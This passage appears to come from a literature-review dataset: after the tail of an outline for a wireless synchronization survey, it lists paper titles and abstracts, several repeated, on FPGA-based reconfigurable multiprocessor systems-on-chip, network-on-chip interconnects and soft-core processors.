non-CDMA based spread spectrum communication systems. Section 7: FUTURE DIRECTIONS Description 7: Discuss anticipated trends and promising directions for future research in synchronization for wireless communication systems, such as millimeter-wave and terahertz frequencies, massive MIMO, full-duplex communications, RF energy harvesting, vehicular communications, cognitive radio networks, and satellite systems. Section 8: CONCLUSIONS Description 8: Summarize the main findings of the survey, emphasize key contributions such as the classification tables, and outline future research directions.
Reconfigurable Multiprocessor Systems: A Review
11
--- paper_title: Multiprocessor System-on-Chip (MPSoC) Technology paper_content: The multiprocessor system-on-chip (MPSoC) uses multiple CPUs along with other hardware subsystems to implement a system. A wide range of MPSoC architectures have been developed over the past decade. This paper surveys the history of MPSoCs to argue that they represent an important and distinct category of computer architecture. We consider some of the technological trends that have driven the design of MPSoCs. We also survey computer-aided design problems relevant to the design of MPSoCs. --- paper_title: An automated exploration framework for FPGA-based soft multiprocessor systems paper_content: FPGA-based soft multiprocessors are viable system solutions for high performance applications. They provide a software abstraction to enable quick implementations on the FPGA. The multiprocessor can be customized for a target application to achieve high performance. Modern FPGAs provide the capacity to build a variety of micro-architectures composed of 20-50 processors, complex memory hierarchies, heterogeneous interconnection schemes and custom co-processors for performance critical operations. However, the diversity in the architectural design space makes it difficult to realize the performance potential of these systems. In this paper we develop an exploration framework to build efficient FPGA multiprocessors for a target application. Our main contribution is a tool based on Integer Linear Programming to explore micro-architectures and allocate application tasks to maximize throughput. Using this tool, we implement a soft multiprocessor for IPv4 packet forwarding that achieves a throughput of 2 Gbps, surpassing the performance of a carefully tuned hand design. --- paper_title: An FPGA-based soft multiprocessor system for IPv4 packet forwarding paper_content: To realize high performance, embedded applications are deployed on multiprocessor platforms tailored for an application domain. However, when a suitable platform is not available, only few application niches can justify the increasing costs of an IC product design. An alternative is to design the multiprocessor on an FPGA. This retains the programmability advantage, while obviating the risks in producing silicon. This also opens FPGAs to the world of software designers. In this paper, we demonstrate the feasibility of FPGA-based multiprocessors for high performance applications. We deploy IPv4 packet forwarding on a multiprocessor on the Xilinx Virtex-II Pro FPGA. The design achieves a 1.8 Gbps throughput and loses only 2.6X in performance (normalized to area) compared to an implementation on the Intel IXP-28OO network processor. We also develop a design space exploration framework using integer linear programming to explore multiprocessor configurations for an application. Using this framework, we achieve a more efficient multiprocessor design surpassing the performance of our hand-tuned solution for packet forwarding. --- paper_title: Advantages of FPGA-based multiprocessor systems in industrial applications paper_content: Today, industrial production machines must be highly flexible in order to competitively account for dynamic and unforeseen changes in the product demands. This paper shows that field-programmable gate arrays (FPGAs) are especially suited to fulfil these requirements; FPGAs are very powerful, relatively inexpensive, and adaptable, since their configuration is specified in an abstract hardware description language. In addition to the benefits resulting from using an FPGA, the case study presented here shows how FPGAs can be used for implementing a sophisticated multiprocessor architecture. In the course of presentation, this paper furthermore argues that due to the excellent tool support and the availability of reusable functional modules (also known as intellectual properties) this approach can be adopted by almost any industrial hardware designer. --- paper_title: An Adaptive Message Passing MPSoC Framework paper_content: Multiprocessor Systems-on-Chips (MPSoCs) offer ::: superior performance while maintaining flexibility and reusability ::: thanks to software oriented personalization. While most ::: MPSoCs are today heterogeneous for better meeting the targeted ::: application requirements, homogeneous MPSoCs may become ::: in a near future a viable alternative bringing other benefits ::: such as run-time load balancing and task migration. The work ::: presented in this paper relies on a homogeneous NoC-based ::: MPSoC framework we developed for exploring scalable and ::: adaptive on-line continuous mapping techniques. Each processor ::: of this system is compact and runs a tiny preemptive operating ::: system that monitors various metrics and is entitled to take ::: remapping decisions through code migration techniques. This ::: approach that endows the architecture with decisional capabilities ::: permits refining application implementation at run-time according ::: to various criteria. Experiments based on simple policies are ::: presented on various applications that demonstrate the benefits ::: of such an approach. --- paper_title: Using Mpi: Portable Parallel Programming with the Message Passing Interface paper_content: This book offers a thoroughly updated guide to the MPI (Message-Passing Interface) standard library for writing programs for parallel computers. Since the publication of the previous edition of Using MPI, parallel computing has become mainstream. Today, applications run on computers with millions of processors; multiple processors sharing memory and multicore processors with multiple hardware threads per core are common. The MPI-3 Forum recently brought the MPI standard up to date with respect to developments in hardware capabilities, core language evolution, the needs of applications, and experience gained over the years by vendors, implementers, and users. This third edition of Using MPI reflects these changes in both text and example code. The book takes an informal, tutorial approach, introducing each concept through easy-to-understand examples, including actual code in C and Fortran. Topics include using MPI in simple programs, virtual topologies, MPI datatypes, parallel libraries, and a comparison of MPI with sockets. For the third edition, example code has been brought up to date; applications have been updated; and references reflect the recent attention MPI has received in the literature. A companion volume, Using Advanced MPI, covers more advanced topics, including hybrid programming and coping with large data. --- paper_title: A Multiprocessor System-on-Chip Implementation of a Laser-based Transparency Meter on an FPGA paper_content: Modern FPGAs are large enough to implement multi-processor systems-on-chip (MPSoCs). Commercial FPGA companies also provide system design tools that abstract sufficient low-level system details to allow non-FPGA experts to design these systems for new applications. The application presented herein was designed by photomask researchers to implement a new technique for measuring the transparency of bimetallic grayscale masks using an FPGA platform. Production of the bimetallic grayscale masks requires a direct-write laser system. Previously, system calibration was determined by writing large rectangles of varying transparency on a mask and then measuring them using a spectrometer. The proposed technique uses the same mask-writing system but adds photodiode sensors connected to a multiprocessor computing system implemented on an FPGA. The added sensors combined with the laser beam's smaller focal point allows the calibration rectangles to be up to 5000 times smaller than those required by the spectrometer. This allows for direct mask verification on a mum-sized scale. Furthermore, the MPSoC design on the FPGA is easily scalable to support an increased number of photodiodes for the future addition of a feedback approach to the project. --- paper_title: An FPGA-based soft multiprocessor system for IPv4 packet forwarding paper_content: To realize high performance, embedded applications are deployed on multiprocessor platforms tailored for an application domain. However, when a suitable platform is not available, only few application niches can justify the increasing costs of an IC product design. An alternative is to design the multiprocessor on an FPGA. This retains the programmability advantage, while obviating the risks in producing silicon. This also opens FPGAs to the world of software designers. In this paper, we demonstrate the feasibility of FPGA-based multiprocessors for high performance applications. We deploy IPv4 packet forwarding on a multiprocessor on the Xilinx Virtex-II Pro FPGA. The design achieves a 1.8 Gbps throughput and loses only 2.6X in performance (normalized to area) compared to an implementation on the Intel IXP-28OO network processor. We also develop a design space exploration framework using integer linear programming to explore multiprocessor configurations for an application. Using this framework, we achieve a more efficient multiprocessor design surpassing the performance of our hand-tuned solution for packet forwarding. --- paper_title: A dual-priority real-time multiprocessor system on FPGA for automotive applications paper_content: This paper presents the implementation of a dual-priority scheduling algorithm for real-time embedded systems on a shared memory multiprocessor on FPGA. The dual-priority microkernel is supported by a multiprocessor interrupt controller to trigger periodic and aperiodic thread activation and manage context switching. We show how the dual-priority algorithm performs on a real system prototype compared to the theoretical performance simulations with a typical standard workload of automotive applications, underlining where the differences are.1 --- paper_title: Multiple Sequence Alignment on an FPGA paper_content: Molecular biologists frequently compute multiple sequence alignments (MSAs) to identify similar regions in protein families. Progressive alignment is a widely used approach to compute MSAs. However, aligning a few hundred sequences by popular progressive alignment tools requires several hours on sequential computers. Due to the rapid growth of biological sequence databases biologists have to compute MSAs in a far shorter time. In this paper we present a new approach to MSA on reconfigurable hardware platforms to gain high performance at low cost. To derive an efficient mapping onto this type of architecture, fine-grained parallel processing elements (PEs) have been designed. Using this PE design as a building block we have constructed a linear systolic array to perform a pairwise sequence distance computation using dynamic programming. This results in an implementation with significant runtime savings on a standard off-the-shelf FPGA --- paper_title: MPSoC design of RT control applications based on FPGA SoftCore processors paper_content: Field programmable gate array (FPGA) based controller offer advantages such as high-speed complex functionality and low power consumption. According to the controller complexity, the FPGA design can be achieved by a multiprocessor system on chip (MPSoC) architectures with mixed software/hardware solutions. The aim of this paper is to design a full speed real time (RT) motor control drive algorithms for FPGA based MPSoC. To this purpose, a new approach is proposed to test controller design by implementing RT motor emulator linked to its controller drive in the same FPGA target. The gain with using this new approach is the ability to push past the operational limits of a specific environment and to test fault conditions that would otherwise be damaging or dangerous for a real motor. The developed MPSoC architectures consist of two and three SoftCore (MicroBlaze) processors that are linked by FIFO style communication. The implementation results, give an overview of MPSOC FPGA based controller benefits and illustrate the effect of interprocessor communication mode. --- paper_title: A parallel MPEG-4 encoder for FPGA based multiprocessor SoC paper_content: A parallel MPEG-4 simple profile encoder for FPGA based multiprocessor system-on-chip (SoC) is presented. The goal is a computationally scalable framework independent of platform. The scalability is achieved by spatial parallelization where images are divided to horizontal slices. Slice coding tasks are mapped to the multiprocessor consisting of four soft-cores arranged into master-slave configuration. Also, the shared memory model is adopted where large images are stored in shared external memory while small on-chip buffers are used for processing. The interconnections between memories and processors are realized with our HIBI network. Our main contributions are the scalable encoder framework as well as methods for coping with limited memory of FPGA. The current software only implementation processes 6 QCIF frames/s with three encoding slaves. In practice, speed-ups of 1.7 and 2.3 have been measured with two and three slaves, respectively. FPGA utilization of current implementation is 59% requiring 24 207 logic elements on Altera Stratix EP1S40. --- paper_title: Advantages of FPGA-based multiprocessor systems in industrial applications paper_content: Today, industrial production machines must be highly flexible in order to competitively account for dynamic and unforeseen changes in the product demands. This paper shows that field-programmable gate arrays (FPGAs) are especially suited to fulfil these requirements; FPGAs are very powerful, relatively inexpensive, and adaptable, since their configuration is specified in an abstract hardware description language. In addition to the benefits resulting from using an FPGA, the case study presented here shows how FPGAs can be used for implementing a sophisticated multiprocessor architecture. In the course of presentation, this paper furthermore argues that due to the excellent tool support and the availability of reusable functional modules (also known as intellectual properties) this approach can be adopted by almost any industrial hardware designer. --- paper_title: An MPSoC architecture for the Multiple Target Tracking application in driver assistant system paper_content: This article discusses the design of an application specific MPSoC architecture dedicated to multiple target tracking (MTT). This application has its utility in driver assistant systems, more precisely in collision avoidance and warning systems. An automotive-radar is used as the front end sensor in our application. The article examines the tradeoffs that must be taken into consideration in the realization of the entire MTT application in an embedded system. In our implementation of MTT, several independent parallel tasks have been identified and mapped onto a multiprocessor architecture to ensure the deadlines imposed by the application. Our study demonstrates that the joint utilization of reconfigurable circuits (namely FPGA) and MPSoC, facilitates the development of a flexible and efficient MTT system. --- paper_title: MPLEM: An 80-processor FPGA Based Multiprocessor System paper_content: Multiprocessor embedded systems (MESes) are a very promising approach for high performance yet relatively low-cost computing. At the same time modern FPGAs provide the silicon capacity to build multiprocessor systems containing 10-100 processors, complex memory systems, heterogeneous interconnection schemes and custom engines executing the performance-critical operations. In this work we present a MES implemented in a state-of-the-art FPGA consisting of up to eighty 32-bit processors. The efficiency of our approach is demonstrated by the fact that our system can execute the BLAST CPU-intensive application, which is the prevalent tool used by molecular biologists for DNA sequence matching and database search, many times faster than a simple PC. --- paper_title: External DDR2-constrained NOC-based 24-processors MPSOC design and implementation on single FPGA paper_content: Network on chip (NOC) has been proposed for the connection substrate of multiprocessor system on chip (SoC) due to limited bandwidth of bus based solutions. Although some designs are emerging actual design experiences of NOC based multiprocessor system on chip remain scarce contrary to simulation based studies. However, implementation constraints clearly affects th design and modelling of a complex multiprocessor. In this paper we present the design and implementation of a 24-processors multiprocessor system with 24 processors under the constraints of limited access to 4 external DDR2 memory banks. All the processors and DDR2 memories are connected to a network on chip through open core protocol (OCP) interface. Multiple clock domains result ing from various IP complexities requires global asynchronous local synchronous (GALS) design methodlogy which adds some extra area. The multiprocessor system is fully implemented on Xilinx Virtex-4 FX140 FPGA based board and uses about 90 % of the chip area. --- paper_title: Operating System for Symmetric Multiprocessors on FPGA paper_content: Soft-core based multiprocessor systems are getting very popular in the FPGA design world. There are many computer architectures that has been used for building multiprocessor systems on FPGAs, including SMP (symmetric multiprocessor). One of the main drawback of this SMP systems is the unavailability of operating systems that allow programming multi-threaded applications that make good use of the multiple processors of the system. This paper details an operating system designed to be used with SMP systems based on the MicroBlaze soft-core processor. The OS is tested with three different applications on an SMP system which implements all the software and hardware required for the OS to work on different SMP systems. --- paper_title: An Adaptive Message Passing MPSoC Framework paper_content: Multiprocessor Systems-on-Chips (MPSoCs) offer ::: superior performance while maintaining flexibility and reusability ::: thanks to software oriented personalization. While most ::: MPSoCs are today heterogeneous for better meeting the targeted ::: application requirements, homogeneous MPSoCs may become ::: in a near future a viable alternative bringing other benefits ::: such as run-time load balancing and task migration. The work ::: presented in this paper relies on a homogeneous NoC-based ::: MPSoC framework we developed for exploring scalable and ::: adaptive on-line continuous mapping techniques. Each processor ::: of this system is compact and runs a tiny preemptive operating ::: system that monitors various metrics and is entitled to take ::: remapping decisions through code migration techniques. This ::: approach that endows the architecture with decisional capabilities ::: permits refining application implementation at run-time according ::: to various criteria. Experiments based on simple policies are ::: presented on various applications that demonstrate the benefits ::: of such an approach. --- paper_title: Symmetric Multiprocessing on Programmable Chips Made Easy paper_content: Vendor-provided softcore processors often support advanced features such as caching that work well in uniprocessor or uncoupled multiprocessor architectures. However, it is a challenge to implement symmetric multiprocessor on a programmable chip (SMPoPC) systems using such processors. This paper presents an implementation of a tightly coupled, cache-coherent symmetric multiprocessing architecture using a vendor-provided softcore processor. Experimental results show that this implementation can be achieved without invasive changes to the vendor-provided softcore processor and without degradation of the performance of the memory system. --- paper_title: Exploring FPGA Capabilities for Building Symmetric Multiprocessor Systems paper_content: Advances in FPGA technologies allow designing highly complex systems using on-chip FPGA resources and intellectual property (IP) cores. Furthermore, it is possible to build multiprocessor systems using hard-core or soft-core processors increasing the range of applications that can be implemented on an FPGA. This paper presents an implementation of a symmetric multiprocessor (SMP) system on an FPGA using a vendor provided soft-core processor and a new set of software libraries specially developed for writing applications for this kind of systems. Experimental results show how this approach can improve performance of parallelizable software applications. --- paper_title: A Taxonomy of Reconfigurable Single-/Multiprocessor Systems-on-Chip paper_content: Runtime adaptivity of hardware in processor architectures is a novel trend, which is under investigation in a variety of research labs all over the world. The runtime exchange of modules, implemented on a reconfigurable hardware, affects the instruction flow (e.g., in reconfigurable instruction set processors) or the data flow, which has a strong impact on the performance of an application. Furthermore, the choice of a certain processor architecture related to the class of target applications is a crucial point in application development. A simple example is the domain of high-performance computing applications found in meteorology or high-energy physics, where vector processors are the optimal choice. A classification scheme for computer systems was provided in 1966 by Flynn where single/multiple data and instruction streams were combined to four types of architectures. This classification is now used as a foundation for an extended classification scheme including runtime adaptivity as further degree of freedom for processor architecture design. The developed scheme is validated by a multiprocessor system implemented on reconfigurable hardware as well as by a classification of existing static and reconfigurable processor systems. --- paper_title: New dimensions for multiprocessor architectures: On demand heterogeneity, infrastructure and performance through reconfigurability — the RAMPSoC approach paper_content: Multiprocessor hardware architectures enable to distribute tasks of an application to several microprocessors, in order to exploit parallelism for accelerating the performance of computation. Especially for the application domain of image data processing, where computation performance is a crucial factor to keep the real-time requirements, this approach is a promising solution for the assembly of high sophisticated algorithms e.g. for object tracking. Changing requirements and the necessary implementation of the tasks in terms of modified algorithms, precision and communication needs to be handled by software and hardware adaptation in state of the art architectures. Field programmable gate arrays (FPGAs) enable to exploit the adaptation of hardware cores and the software running on embedded microprocessor cores on an integrated multiprocessor system. --- paper_title: Very high-speed computing systems paper_content: Very high-speed computers may be classified as follows: 1) Single Instruction Stream-Single Data Stream (SISD) 2) Single Instruction Stream-Multiple Data Stream (SIMD) 3) Multiple Instruction Stream-Single Data Stream (MISD) 4) Multiple Instruction Stream-Multiple Data Stream (MIMD). "Stream," as used here, refers to the sequence of data or instructions as seen by the machine during the execution of a program. The constituents of a system: storage, execution, and instruction handling (branching) are discussed with regard to recent developments and/or systems limitations. The constituents are discussed in terms of concurrent SISD systems (CDC 6600 series and, in particular, IBM Model 90 series), since multiple stream organizations usually do not require any more elaborate components. Representative organizations are selected from each class and the arrangement of the constituents is shown. --- paper_title: Parallel and flexible multiprocessor system-on-chip for adaptive automotive applications based on Xilinx MicroBlaze soft-cores paper_content: Xilinx Virtex FPGAs offer the possibility of dynamic and partial run-time reconfiguration. When designing a system that includes this feature it has to be made sure, that no signal lines cross the border to other reconfigurable regions. The complex modular design flow to generate partial bitstreams and the need of macros for physical interconnection of IP-Cores causes the necessity to investigate in alternatives. This paper describes the design and implementation of a software reconfigurable multiprocessor system, based on Xilinx MicroBlaze softcore processors. A real application in the automotive domain implemented on a Xilinx Virtex-II 3000 FPGA is used to present results. --- paper_title: MPLEM: An 80-processor FPGA Based Multiprocessor System paper_content: Multiprocessor embedded systems (MESes) are a very promising approach for high performance yet relatively low-cost computing. At the same time modern FPGAs provide the silicon capacity to build multiprocessor systems containing 10-100 processors, complex memory systems, heterogeneous interconnection schemes and custom engines executing the performance-critical operations. In this work we present a MES implemented in a state-of-the-art FPGA consisting of up to eighty 32-bit processors. The efficiency of our approach is demonstrated by the fact that our system can execute the BLAST CPU-intensive application, which is the prevalent tool used by molecular biologists for DNA sequence matching and database search, many times faster than a simple PC. --- paper_title: Design and Implementation of a Resource-Efficient Communication Architecture for Multiprocessors on FPGAs paper_content: Recent significant advancements in FPGAs have made it viable to explore multiprocessor solutions on a single FPGA chip. An efficient communication architecture that matches the needs of the target application is always critical to the overall performance of multiprocessors. Packet-switching network-on-chip (NoC) approaches are being offered to deal with scalability and complexity challenges coming along with the increasing number of processing elements (PEs). Many FPGA-based NoC designs consume significant resources, leaving little room for PEs. We argue that computation is still the primary task of multiprocessors and sufficient resources should be reserved for PEs. This paper presents our novel design and implementation of a resource-efficient communication architecture for multiprocessors on FPGAs. We reduce not only the required number of routers for a given number of PEs by introducing a new PE-router topology, but also resource requirements of each router, while maintaining good performance for typical injection rates. --- paper_title: External DDR2-constrained NOC-based 24-processors MPSOC design and implementation on single FPGA paper_content: Network on chip (NOC) has been proposed for the connection substrate of multiprocessor system on chip (SoC) due to limited bandwidth of bus based solutions. Although some designs are emerging actual design experiences of NOC based multiprocessor system on chip remain scarce contrary to simulation based studies. However, implementation constraints clearly affects th design and modelling of a complex multiprocessor. In this paper we present the design and implementation of a 24-processors multiprocessor system with 24 processors under the constraints of limited access to 4 external DDR2 memory banks. All the processors and DDR2 memories are connected to a network on chip through open core protocol (OCP) interface. Multiple clock domains result ing from various IP complexities requires global asynchronous local synchronous (GALS) design methodlogy which adds some extra area. The multiprocessor system is fully implemented on Xilinx Virtex-4 FX140 FPGA based board and uses about 90 % of the chip area. --- paper_title: HIBI-based multiprocessor SoC on FPGA paper_content: An FPGA offers an excellent platform for a system-on-chip consisting of intellectual property (IP) blocks. The problem is that IP blocks and their interconnections are often FPGA vendor dependent. Our HIBI (heterogeneous IP block interconnection) network-on-chip (NoC) scheme solves the problem by providing a flexible interconnection network and IP block integration with an open core protocol (OCP) interface. Therefore, IP components can be of any type: processors; hardware accelerators; communication interfaces; memories. As a proof of concept, a multiprocessor system with eight soft processor cores and HIBI is prototyped on FPGA. The whole system uses 36,402 logic elements, 2.9 Mbits of RAM, and operates at 78 MHz frequency on the Altera Stratix 1S40, which is comparable to other FPGA multiprocessors. The most important benefit is significant reduction of the design effort compared to system specific interconnection networks. HIBI also presents the first OCP compliant IP-block integration in FPGA. --- paper_title: Evaluating Network-on-Chip for Homogeneous Embedded Multiprocessors in FPGAs paper_content: This paper presents performance and area evaluation of a homogeneous multiprocessor communication system based on network-on-chip (NoC) in FPGA platforms. Two homogenous chip multiprocessor proposals were designed and compared for Xilinx FPGAs using MicroBlaze processors: one based on NoC and the other based on shared memory/bus. One of the main findings is the communication performance evaluation of NoC for parallel computing applications. The comparison results show that an efficient implementation of NoC on FPGA can improve communication speed by up to seven times with low area overhead, according to the data size and the number of processors connected to the network. --- paper_title: Prototyping pipelined applications on a heterogeneous FPGA multiprocessor virtual platform paper_content: Multiprocessors on a chip are the reality of these days. Semiconductor industry has recognized this approach as the most efficient in order to exploit chip resources, but the success of this paradigm heavily relies on the efficiency and widespread diffusion of parallel software. Among the many techniques to express the parallelism of applications, this paper focuses on pipelining, a technique well suited to data-intensive multimedia applications. We introduce a prototyping platform (FPGA-based) and a methodology for these applications. Our platform consists of a mix of standard and custom heterogeneous cores. We discuss several case studies, analyzing the interaction of the architecture and applications and we show that multimedia and telecommunication applications with unbalanced pipeline stages can be easily deployed. Our framework eases the development cycle and enables the developers to focus directly on the problems posed by the programming model in the direction of the implementation of a production system. --- paper_title: Generic crossbar network on chip for FPGA MPSoCs paper_content: Networks-on-chip (NoCs) have emerged as a new design paradigm to implement MPSoCs that competes with the standard bus approach. They offer more scalability, flexibility, and bandwidth. Nevertheless, FPGA manufacturers still use the bus paradigm in their development frameworks. In this paper, we study the complexity and performances of a FPGA implementation for a crossbar NoC. We propose a generic architecture and characterize its complexity, maximum frequency of operation, and global throughput for NoCs supporting 2 to 8 nodes. Results show that FPGA-based designs would benefit from such architecture when high throughput must be reached. Finally, we present a fully functional 3times3 NoC interconnecting a PowerPC and 2 Xtensa processors implemented in a VirtexII Pro FPGA. --- paper_title: A network on chip architecture and design methodology paper_content: We propose a packet switched platform for single chip systems which scales well to an arbitrary number of processor like resources. The platform, which we call Network-on-Chip (NOC), includes both the architecture and the design methodology. The NOC architecture is a m/spl times/n mesh of switches and resources are placed on the slots formed by the switches. We assume a direct layout of the 2-D mesh of switches and resources providing physical- and architectural-level design integration. Each switch is connected to one resource and four neighboring switches, and each resource is connected to one switch. A resource can be a processor core, memory, an FPGA, a custom hardware block or any other intellectual property (IP) block, which fits into the available slot and complies with the interface of the NOC. The NOC architecture essentially is the onchip communication infrastructure comprising the physical layer, the data link layer and the network layer of the OSI protocol stack. We define the concept of a region, which occupies an area of any number of resources and switches. This concept allows the NOC to accommodate large resources such as large memory banks, FPGA areas, or special purpose computation resources such as high performance multi-processors. The NOC design methodology consists of two phases. In the first phase a concrete architecture is derived from the general NOC template. The concrete architecture defines the number of switches and shape of the network, the kind and shape of regions and the number and kind of resources. The second phase maps the application onto the concrete architecture to form a concrete product. --- paper_title: Symmetric Multiprocessing on Programmable Chips Made Easy paper_content: Vendor-provided softcore processors often support advanced features such as caching that work well in uniprocessor or uncoupled multiprocessor architectures. However, it is a challenge to implement symmetric multiprocessor on a programmable chip (SMPoPC) systems using such processors. This paper presents an implementation of a tightly coupled, cache-coherent symmetric multiprocessing architecture using a vendor-provided softcore processor. Experimental results show that this implementation can be achieved without invasive changes to the vendor-provided softcore processor and without degradation of the performance of the memory system. --- paper_title: Evaluating Large System-on-Chip on Multi-FPGA Platform paper_content: This paper presents a configurable base architecture tailorable for different applications. It allows simple and rapid way to evaluate and prototype large Multi-Processor System-on-Chip architectures on multiple FPGAs with support to Globally Asynchronous Locally Synchronous scheme. It allows early hardware/software co-verification and optimization. The architecture abstracts the underlying hardware details from the processors so that knowledge about the exact locations of individual components are not required for communication. Implemented example architecture contains 58 IP blocks, including 35 Nios II soft processors. As a proof of concept, a MPEG-4 video encoder is run on the example architecture. --- paper_title: Multistage Interconnection Network for MPSoC: Performances study and prototyping on FPGA paper_content: Multiprocessor system on chip is a concept that aims to integrate multiple hardware and software in a chip. multistage interconnection network is considered as a promising solution for applications which use parallel architectures integrating a large number of processors and memories. in this paper, we present a model of multistage interconnection network and a design of prototyping on FPGA. This enabled the comparison of the proposed model with the full crossbar network, and the estimation of performance in terms of area, latency and energy consumption. The Multistage Interconnection Networks are well adapted to MPSoC architecture. They meet the needs of intensive signal processing and they are scalable to connect a large number of modules. --- paper_title: Star-Wheels Network-on-Chip featuring a self-adaptive mixed topology and a synergy of a circuit - and a packet-switching communication protocol paper_content: Multiprocessor System-on-Chip is a promising realization alternative for the next generation of computing architectures providing the required data processing performance in high performance computing applications. Numerous scientists from industry and academic institutions investigate and develop novel processing elements and accelerators as can be seen in real devices like IBM's Cell or nVIDIA's Tesla GPU. Nevertheless, the on-chip communication of these multiple processor elements has to be optimized tailored to the actual requirement of the data to be processed. Network-on-Chip (NoC), Bus-based or even heterogeneous communication on chip often suffer from the fact of being inflexible due to their fixed physical realization. This paper presents a novel approach for a NoC, exploiting circuit-and packed-switched communication as well as a run-time adaptive and heterogeneous topology. An application scenario from image processing exploiting the implemented NoC on an FPGA delivers results like performance data and hardware costs. --- paper_title: Exploring FPGA Capabilities for Building Symmetric Multiprocessor Systems paper_content: Advances in FPGA technologies allow designing highly complex systems using on-chip FPGA resources and intellectual property (IP) cores. Furthermore, it is possible to build multiprocessor systems using hard-core or soft-core processors increasing the range of applications that can be implemented on an FPGA. This paper presents an implementation of a symmetric multiprocessor (SMP) system on an FPGA using a vendor provided soft-core processor and a new set of software libraries specially developed for writing applications for this kind of systems. Experimental results show how this approach can improve performance of parallelizable software applications. --- paper_title: An Interrupt Controller for FPGA-based Multiprocessors paper_content: Interrupt-based programming is widely used for interfacing a processor with peripherals and allowing software threads to interact. Many hardware/software architectures have been proposed in the past to support this kind of programming practice. In the context of FPGA-based multiprocessors this topic has not been thoroughly faced yet. This paper presents the architecture of an interrupt controller for a FPGA-based multiprocessor composed of standard off-of-the-shelf softcores. The main feature of this device is to distribute multiple interrupts across the cores of a multiprocessor. In addition, our architecture supports several advanced features like booking, broadcasting and inter-processor interrupt. On the top of this hardware layer, we provide a software library to effectively exploit this mechanism. We realized a prototype of this system. Our experiments show that our interrupt controller efficiently distributes multiple interrupts on the system. --- paper_title: MPLEM: An 80-processor FPGA Based Multiprocessor System paper_content: Multiprocessor embedded systems (MESes) are a very promising approach for high performance yet relatively low-cost computing. At the same time modern FPGAs provide the silicon capacity to build multiprocessor systems containing 10-100 processors, complex memory systems, heterogeneous interconnection schemes and custom engines executing the performance-critical operations. In this work we present a MES implemented in a state-of-the-art FPGA consisting of up to eighty 32-bit processors. The efficiency of our approach is demonstrated by the fact that our system can execute the BLAST CPU-intensive application, which is the prevalent tool used by molecular biologists for DNA sequence matching and database search, many times faster than a simple PC. --- paper_title: External DDR2-constrained NOC-based 24-processors MPSOC design and implementation on single FPGA paper_content: Network on chip (NOC) has been proposed for the connection substrate of multiprocessor system on chip (SoC) due to limited bandwidth of bus based solutions. Although some designs are emerging actual design experiences of NOC based multiprocessor system on chip remain scarce contrary to simulation based studies. However, implementation constraints clearly affects th design and modelling of a complex multiprocessor. In this paper we present the design and implementation of a 24-processors multiprocessor system with 24 processors under the constraints of limited access to 4 external DDR2 memory banks. All the processors and DDR2 memories are connected to a network on chip through open core protocol (OCP) interface. Multiple clock domains result ing from various IP complexities requires global asynchronous local synchronous (GALS) design methodlogy which adds some extra area. The multiprocessor system is fully implemented on Xilinx Virtex-4 FX140 FPGA based board and uses about 90 % of the chip area. --- paper_title: Lightweight DMA management mechanisms for multiprocessors on FPGA paper_content: This paper presents a multiprocessor system on FPGA that adopts Direct Memory Access (DMA) mechanisms to move data between the external memory and the local memory of each processor. The system integrates all standard DMA primitives via a fast Application Programming Interface (API) and relies on interrupts having also the possibility to manage a command list. This interface allows to program the embedded multiprocessor architecture on FPGA with simple DMAs using the same DMA techniques adopted on high performance multiprocessors with complex DMA controllers. Several experiments demonstrate the performance of our solution, allowing 57% improvement on the execution time of a selected set of benchmarks. We furthermore show how some DMA programming techniques (double and multi-buffering) can be effectively used within our platform, thus easing the design and development of the hardware and the software in a reconfigurable DMA-based environment. --- paper_title: A Multiprocessor System-on-Chip Implementation of a Laser-based Transparency Meter on an FPGA paper_content: Modern FPGAs are large enough to implement multi-processor systems-on-chip (MPSoCs). Commercial FPGA companies also provide system design tools that abstract sufficient low-level system details to allow non-FPGA experts to design these systems for new applications. The application presented herein was designed by photomask researchers to implement a new technique for measuring the transparency of bimetallic grayscale masks using an FPGA platform. Production of the bimetallic grayscale masks requires a direct-write laser system. Previously, system calibration was determined by writing large rectangles of varying transparency on a mask and then measuring them using a spectrometer. The proposed technique uses the same mask-writing system but adds photodiode sensors connected to a multiprocessor computing system implemented on an FPGA. The added sensors combined with the laser beam's smaller focal point allows the calibration rectangles to be up to 5000 times smaller than those required by the spectrometer. This allows for direct mask verification on a mum-sized scale. Furthermore, the MPSoC design on the FPGA is easily scalable to support an increased number of photodiodes for the future addition of a feedback approach to the project. --- paper_title: An automated exploration framework for FPGA-based soft multiprocessor systems paper_content: FPGA-based soft multiprocessors are viable system solutions for high performance applications. They provide a software abstraction to enable quick implementations on the FPGA. The multiprocessor can be customized for a target application to achieve high performance. Modern FPGAs provide the capacity to build a variety of micro-architectures composed of 20-50 processors, complex memory hierarchies, heterogeneous interconnection schemes and custom co-processors for performance critical operations. However, the diversity in the architectural design space makes it difficult to realize the performance potential of these systems. In this paper we develop an exploration framework to build efficient FPGA multiprocessors for a target application. Our main contribution is a tool based on Integer Linear Programming to explore micro-architectures and allocate application tasks to maximize throughput. Using this tool, we implement a soft multiprocessor for IPv4 packet forwarding that achieves a throughput of 2 Gbps, surpassing the performance of a carefully tuned hand design. --- paper_title: An FPGA-based soft multiprocessor system for IPv4 packet forwarding paper_content: To realize high performance, embedded applications are deployed on multiprocessor platforms tailored for an application domain. However, when a suitable platform is not available, only few application niches can justify the increasing costs of an IC product design. An alternative is to design the multiprocessor on an FPGA. This retains the programmability advantage, while obviating the risks in producing silicon. This also opens FPGAs to the world of software designers. In this paper, we demonstrate the feasibility of FPGA-based multiprocessors for high performance applications. We deploy IPv4 packet forwarding on a multiprocessor on the Xilinx Virtex-II Pro FPGA. The design achieves a 1.8 Gbps throughput and loses only 2.6X in performance (normalized to area) compared to an implementation on the Intel IXP-28OO network processor. We also develop a design space exploration framework using integer linear programming to explore multiprocessor configurations for an application. Using this framework, we achieve a more efficient multiprocessor design surpassing the performance of our hand-tuned solution for packet forwarding. --- paper_title: A dual-priority real-time multiprocessor system on FPGA for automotive applications paper_content: This paper presents the implementation of a dual-priority scheduling algorithm for real-time embedded systems on a shared memory multiprocessor on FPGA. The dual-priority microkernel is supported by a multiprocessor interrupt controller to trigger periodic and aperiodic thread activation and manage context switching. We show how the dual-priority algorithm performs on a real system prototype compared to the theoretical performance simulations with a typical standard workload of automotive applications, underlining where the differences are.1 --- paper_title: MPSoC design of RT control applications based on FPGA SoftCore processors paper_content: Field programmable gate array (FPGA) based controller offer advantages such as high-speed complex functionality and low power consumption. According to the controller complexity, the FPGA design can be achieved by a multiprocessor system on chip (MPSoC) architectures with mixed software/hardware solutions. The aim of this paper is to design a full speed real time (RT) motor control drive algorithms for FPGA based MPSoC. To this purpose, a new approach is 